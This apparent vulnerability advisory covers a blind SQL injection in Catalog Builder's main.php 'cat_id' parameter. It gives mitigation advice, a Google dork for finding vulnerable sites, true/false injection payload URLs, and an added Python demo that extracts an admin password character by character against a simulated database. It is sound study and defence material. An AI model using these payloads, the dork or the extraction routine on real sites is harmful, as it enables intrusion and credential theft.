Vendor: Ecommerce Software
By: takeshix
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Ecommerce Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Fedora
Year: 2011

Catalog Builder – Ecommerce Software – Blind SQL Injection Vulnerability

Catalog Builder is vulnerable to boolean-based blind SQL injection. The 'cat_id' parameter of the 'main.php' script is placed into a database query without sanitisation or parameterisation, so an attacker can append SQL to the parameter and have it executed by the backend database. No query output or error text is returned directly; instead the page renders differently depending on whether the injected condition is true or false, and that difference can be used as an oracle to extract sensitive information from the database one character at a time.

Mitigation:

Input validation on its own is not a sufficient fix. 'cat_id' should be treated as an integer (cast it, or reject any non-numeric value), and every user-supplied value must be passed to the database through parameterised (prepared) statements rather than concatenated into the query string. Filtering quotes or keywords without parameterisation leaves the underlying flaw in place.
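The following is an added example and is not part of the advisory or of Catalog Builder's own code. It models the flaw in main.php with an in-memory SQLite database (the schema, table names and the admin row are invented for the demo), reuses the payload shape from the exploit text as a true/false oracle to dump a value character by character, and places the parameterised form of the same lookup beside it to show that the identical payload then does nothing.

```python
import sqlite3


# Constructed stand-in for the Catalog Builder backend: the schema, table names and
# the admin row are assumptions for this demo, not taken from the real product.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (cat_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", [(1, "Books"), (2, "Toys")])
    conn.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return conn


def vulnerable_main_php(conn, cat_id):
    """Models main.php concatenating ?cat_id= straight into the query (the flaw).
    Returns True when a category row comes back, False otherwise: that one bit of
    difference in the rendered page is the blind oracle."""
    sql = "SELECT name FROM categories WHERE cat_id = '" + cat_id + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query renders the same "no category" page


def hardened_main_php(conn, cat_id):
    """Mitigated form: the value is bound as a parameter, never spliced into SQL."""
    sql = "SELECT name FROM categories WHERE cat_id = ?"
    return conn.execute(sql, (cat_id,)).fetchone() is not None


def oracle(conn, condition):
    """Wrap an arbitrary SQL condition in the advisory's payload shape:
    1' AND <condition> AND 'takeshix'='takeshix"""
    payload = "1' AND (" + condition + ") AND 'takeshix'='takeshix"
    return vulnerable_main_php(conn, payload)


def extract(conn, subquery, max_len=64):
    """Boolean-based blind extraction of a string-valued subquery result.
    Each character is recovered by binary search over its code point
    (7 oracle calls per ASCII character) after a cheap length check."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo():
    conn = make_db()
    # The two probes from the exploit text: identical except for the final quote trick.
    true_probe = "1' AND 1337=1337 AND 'takeshix'='takeshix"
    false_probe = "1' AND 1337=1337 AND 'takeshix'='takeshixx"
    return {
        "vuln_true": vulnerable_main_php(conn, true_probe),
        "vuln_false": vulnerable_main_php(conn, false_probe),
        "hardened_normal": hardened_main_php(conn, "1"),
        "hardened_probe": hardened_main_php(conn, true_probe),
        "dumped": extract(conn, "SELECT password FROM admin WHERE username = 'admin'"),
    }


if __name__ == "__main__":
    print(demo())
```

Against the parameterised lookup the probe is compared as a literal string and matches no row, so the true/false oracle disappears; the integer cast recommended above would reject it before the query is even built.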

Exploit-DB raw data:

+------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: takeshix.query@googlemail.com
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------

vulnerable url:

/catalog/main.php?cat_id=[blind sqli]

example:

http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false

--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+